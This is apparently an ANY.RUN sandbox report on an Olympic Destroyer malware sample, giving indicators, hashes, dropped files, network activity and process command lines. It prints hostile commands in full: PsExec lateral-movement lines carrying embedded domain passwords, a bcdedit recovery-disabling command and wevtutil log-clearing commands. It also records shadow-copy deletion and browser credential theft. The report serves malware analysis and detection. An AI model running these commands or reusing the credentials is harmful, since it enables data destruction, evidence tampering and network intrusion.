File name: OlympicDestroyerAtos.bin
Full analysis: https://app.any.run/tasks/405556b5-6d57-4b59-9676-b8933a4bae23
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: February 08, 2025, 18:11:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
psexec
stealer
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5: EC724EF33521C4C2965DE078E36C8277
SHA1: D7B6602967EEA9806EE8A91284E616CFDF5F255D
SHA256: 28858CC6E05225F7D156D1C6A21ED11188777FA0A752CB7B56038D79A88627CC
SSDEEP: 98304:wV+yfQYJRSOT8FJHgZ5wnMOZg4VpKsG/srEEQ4017Go2M9mvtUqMDjO0YdQXQ4:+esr7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Steals credentials from Web Browsers

      • noope.exe (PID: 116)
    • Actions look like stealing of personal data

      • noope.exe (PID: 116)
    • Deletes shadow copies

      • cmd.exe (PID: 2276)
      • cmd.exe (PID: 2260)
    • Using BCDEDIT.EXE to modify recovery options

      • cmd.exe (PID: 1868)
  • SUSPICIOUS

    • Reads the Internet Settings

      • noope.exe (PID: 116)
      • _otf.exe (PID: 2000)
      • _otf.exe (PID: 1780)
      • _otf.exe (PID: 1180)
      • _otf.exe (PID: 3372)
      • _otf.exe (PID: 3032)
      • _otf.exe (PID: 3368)
      • _otf.exe (PID: 3028)
      • _otf.exe (PID: 600)
      • _otf.exe (PID: 3536)
      • _otf.exe (PID: 3460)
      • _otf.exe (PID: 3528)
      • _otf.exe (PID: 3720)
      • _otf.exe (PID: 3704)
      • _otf.exe (PID: 3412)
      • _otf.exe (PID: 3860)
      • _otf.exe (PID: 3928)
      • _otf.exe (PID: 3924)
      • _otf.exe (PID: 4076)
      • _otf.exe (PID: 2448)
      • _otf.exe (PID: 1676)
      • _otf.exe (PID: 188)
    • Searches for installed software

      • noope.exe (PID: 116)
    • Executable content was dropped or overwritten

      • OlympicDestroyerAtos.bin.exe (PID: 1916)
    • PSEXEC has been detected

      • _otf.exe (PID: 1780)
      • _otf.exe (PID: 1232)
      • _otf.exe (PID: 188)
      • _otf.exe (PID: 2000)
      • _otf.exe (PID: 3372)
      • _otf.exe (PID: 1180)
      • _otf.exe (PID: 3032)
      • _otf.exe (PID: 3368)
      • _otf.exe (PID: 3028)
      • _otf.exe (PID: 600)
      • _otf.exe (PID: 3536)
      • _otf.exe (PID: 3460)
      • _otf.exe (PID: 3528)
      • _otf.exe (PID: 3720)
      • _otf.exe (PID: 3704)
      • _otf.exe (PID: 3412)
      • _otf.exe (PID: 3860)
      • _otf.exe (PID: 3924)
      • _otf.exe (PID: 3928)
      • _otf.exe (PID: 4076)
      • _otf.exe (PID: 2448)
      • _otf.exe (PID: 1676)
      • _otf.exe (PID: 2180)
    • Uses WEVTUTIL.EXE to clean up logs

      • cmd.exe (PID: 2620)
      • cmd.exe (PID: 1288)
    • Starts CMD.EXE for command execution

      • _ksf.exe (PID: 1800)
  • INFO

    • Checks supported languages

      • OlympicDestroyerAtos.bin.exe (PID: 1916)
      • noope.exe (PID: 116)
      • wmpnscfg.exe (PID: 1332)
      • _ksf.exe (PID: 1800)
      • _otf.exe (PID: 1232)
      • _otf.exe (PID: 1780)
      • _otf.exe (PID: 188)
      • _otf.exe (PID: 3372)
      • _otf.exe (PID: 1180)
      • _otf.exe (PID: 2000)
      • _otf.exe (PID: 3368)
      • _otf.exe (PID: 3032)
      • _otf.exe (PID: 3028)
      • _otf.exe (PID: 600)
      • _otf.exe (PID: 3536)
      • _otf.exe (PID: 3460)
      • _otf.exe (PID: 3528)
      • _otf.exe (PID: 3720)
      • _otf.exe (PID: 3704)
      • _otf.exe (PID: 3928)
      • _otf.exe (PID: 3412)
      • _otf.exe (PID: 3860)
      • _otf.exe (PID: 3924)
      • _otf.exe (PID: 4076)
      • _otf.exe (PID: 2448)
      • _otf.exe (PID: 1676)
      • _otf.exe (PID: 2180)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 1332)
    • Reads the computer name

      • OlympicDestroyerAtos.bin.exe (PID: 1916)
      • wmpnscfg.exe (PID: 1332)
      • noope.exe (PID: 116)
      • _ksf.exe (PID: 1800)
      • _otf.exe (PID: 188)
      • _otf.exe (PID: 1232)
      • _otf.exe (PID: 1780)
      • _otf.exe (PID: 3372)
      • _otf.exe (PID: 2000)
      • _otf.exe (PID: 1180)
      • _otf.exe (PID: 3032)
      • _otf.exe (PID: 3368)
      • _otf.exe (PID: 3028)
      • _otf.exe (PID: 600)
      • _otf.exe (PID: 3536)
      • _otf.exe (PID: 3460)
      • _otf.exe (PID: 3528)
      • _otf.exe (PID: 3720)
      • _otf.exe (PID: 3704)
      • _otf.exe (PID: 3412)
      • _otf.exe (PID: 3860)
      • _otf.exe (PID: 3924)
      • _otf.exe (PID: 3928)
      • _otf.exe (PID: 4076)
      • _otf.exe (PID: 2448)
      • _otf.exe (PID: 1676)
      • _otf.exe (PID: 2180)
    • Creates files in a temporary directory

      • OlympicDestroyerAtos.bin.exe (PID: 1916)
      • noope.exe (PID: 116)
    • Reads the machine GUID from the registry

      • OlympicDestroyerAtos.bin.exe (PID: 1916)
    • The sample is compiled with English language support

      • OlympicDestroyerAtos.bin.exe (PID: 1916)
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2017:12:27 11:39:22+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 121856
InitializedDataSize: 1743872
UninitializedDataSize: -
EntryPoint: 0xb516
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
Total processes: 100
Monitored processes: 39
Malicious processes: 5
Suspicious processes: 1

Behavior graph

Process nodes, in the order shown in the graph:

• start
• olympicdestroyeratos.bin.exe
• wmpnscfg.exe (no specs)
• noope.exe
• _ksf.exe (no specs)
• cmd.exe (no specs)
• vssadmin.exe (no specs)
• THREAT _otf.exe (no specs)
• cmd.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• wbadmin.exe (no specs)
• cmd.exe (no specs)
• bcdedit.exe (no specs)
• bcdedit.exe (no specs)
• cmd.exe (no specs)
• wevtutil.exe (no specs)
• cmd.exe (no specs)
• wevtutil.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• THREAT _otf.exe (no specs)
• _otf.exe (no specs)

Process information

PID: 116
CMD: 123 \\.\pipe\B7324CD9-1C05-4F77-A566-AFE4FBB551F1
Path: C:\Users\admin\AppData\Local\Temp\noope.exe
Parent process: OlympicDestroyerAtos.bin.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 188
CMD: C:\Users\admin\AppData\Local\Temp\_otf.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\admin\AppData\Local\Temp\_mju.exe"
Path: C:\Users\admin\AppData\Local\Temp\_otf.exe
Parent process: OlympicDestroyerAtos.bin.exe
User: admin
Company: Sysinternals - www.sysinternals.com
Integrity Level: MEDIUM
Description: Execute processes remotely
Exit code: 6
Version: 2.2

PID: 444
CMD: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Path: C:\Windows\System32\bcdedit.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Boot Configuration Data Editor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 600
CMD: C:\Users\admin\AppData\Local\Temp\_otf.exe \\192.168.100.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\admin\AppData\Local\Temp\_mju.exe"
Path: C:\Users\admin\AppData\Local\Temp\_otf.exe
Parent process: OlympicDestroyerAtos.bin.exe
User: admin
Company: Sysinternals - www.sysinternals.com
Integrity Level: MEDIUM
Description: Execute processes remotely
Exit code: 6
Version: 2.2

PID: 660
CMD: wevtutil.exe cl System
Path: C:\Windows\System32\wevtutil.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Eventing Command Line Utility
Exit code: 5
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 1180
CMD: C:\Users\admin\AppData\Local\Temp\_otf.exe \\192.168.100.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\admin\AppData\Local\Temp\_mju.exe"
Path: C:\Users\admin\AppData\Local\Temp\_otf.exe
Parent process: OlympicDestroyerAtos.bin.exe
User: admin
Company: Sysinternals - www.sysinternals.com
Integrity Level: MEDIUM
Description: Execute processes remotely
Exit code: 6
Version: 2.2

PID: 1232
CMD: C:\Users\admin\AppData\Local\Temp\_otf.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\admin\AppData\Local\Temp\_mju.exe"
Path: C:\Users\admin\AppData\Local\Temp\_otf.exe
Parent process: OlympicDestroyerAtos.bin.exe
User: admin
Company: Sysinternals - www.sysinternals.com
Integrity Level: MEDIUM
Description: Execute processes remotely
Version: 2.2

PID: 1288
CMD: C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
Path: C:\Windows\System32\cmd.exe
Parent process: _ksf.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 5
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 1332
CMD: "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Path: C:\Program Files\Windows Media Player\wmpnscfg.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Media Player Network Sharing Service Configuration Application
Exit code: 0
Version: 12.0.7600.16385 (win7_rtm.090713-1255)

PID: 1600
CMD: wevtutil.exe cl Security
Path: C:\Windows\System32\wevtutil.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Eventing Command Line Utility
Exit code: 5
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 8 338
Read events: 8 312
Write events: 26
Delete events: 0

Modification events

Process: (188) _otf.exe
Key: HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation: write
Name: EulaAccepted
Value: 1

Process: (1780) _otf.exe
Key: HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation: write
Name: EulaAccepted
Value: 1

Process: (116) noope.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value: (empty)

Process: (116) noope.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

Process: (116) noope.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

Process: (1232) _otf.exe
Key: HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation: write
Name: EulaAccepted
Value: 1

Process: (2000) _otf.exe
Key: HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation: write
Name: EulaAccepted
Value: 1

Process: (3372) _otf.exe
Key: HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation: write
Name: EulaAccepted
Value: 1

Process: (1180) _otf.exe
Key: HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation: write
Name: EulaAccepted
Value: 1

Process: (3032) _otf.exe
Key: HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation: write
Name: EulaAccepted
Value: 1
Executable files: 5
Suspicious files: 1
Text files: 0
Unknown types: 0

Dropped files

PID: 116
Process: noope.exe
Filename: C:\Users\admin\AppData\Local\Temp\chr7FF0.tmp
Type: binary
MD5: 52E51471E9281235323F633CD0DEA56C
SHA256: 147F3137B387FE4FBE3215B7864568404580A799D031009FE9C718F4C2EF87D0

PID: 1916
Process: OlympicDestroyerAtos.bin.exe
Filename: C:\Users\admin\AppData\Local\Temp\noope.exe
Type: executable
MD5: 68970B2CD5430C812BEF5B87C1ADD6EA
SHA256: E4E1E3C44E01C60FD433C6283BD8CD15A9941E1CBAAD72E6409CC92E2E91263E

PID: 1916
Process: OlympicDestroyerAtos.bin.exe
Filename: C:\Users\admin\AppData\Local\Temp\_otf.exe
Type: executable
MD5: 27304B246C7D5B4E149124D5F93C5B01
SHA256: 3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF

PID: 1916
Process: OlympicDestroyerAtos.bin.exe
Filename: C:\Users\admin\AppData\Local\Temp\_ksf.exe
Type: executable
MD5: 3C0D740347B0362331C882C2DEE96DBF
SHA256: AE9A4E244A9B3C77D489DEE8AEAF35A7C3BA31B210E76D81EF2E91790F052C85

PID: 1916
Process: OlympicDestroyerAtos.bin.exe
Filename: C:\Users\admin\AppData\Local\Temp\_mju.exe
Type: executable
MD5: EC724EF33521C4C2965DE078E36C8277
SHA256: 28858CC6E05225F7D156D1C6A21ED11188777FA0A752CB7B56038D79A88627CC
HTTP(S) requests: 0
TCP/UDP connections: 30
DNS requests: 7
Threats: 0

HTTP requests

No HTTP requests

Connections

The Domain, ASN and CN columns are empty for every row in the report.

PID   Process      IP                     Reputation
4     System       192.168.100.255:137    whitelisted
4     System       192.168.100.255:138    whitelisted
1108  svchost.exe  224.0.0.252:5355       whitelisted
4     System       192.168.100.2:137      whitelisted
668   svchost.exe  192.168.100.2:135      whitelisted
                   192.168.100.2:445      whitelisted
                   192.168.100.2:139      whitelisted
                   192.168.100.2:80       whitelisted

DNS requests

Domain                        IP           Reputation
252.0.0.224.in-addr.arpa                   unknown
22.0.0.224.in-addr.arpa                    unknown
2.100.168.192.in-addr.arpa                 whitelisted
255.100.168.192.in-addr.arpa               unknown
igmp.mcast.net                224.0.0.22   whitelisted

Threats

No threats detected
No debug info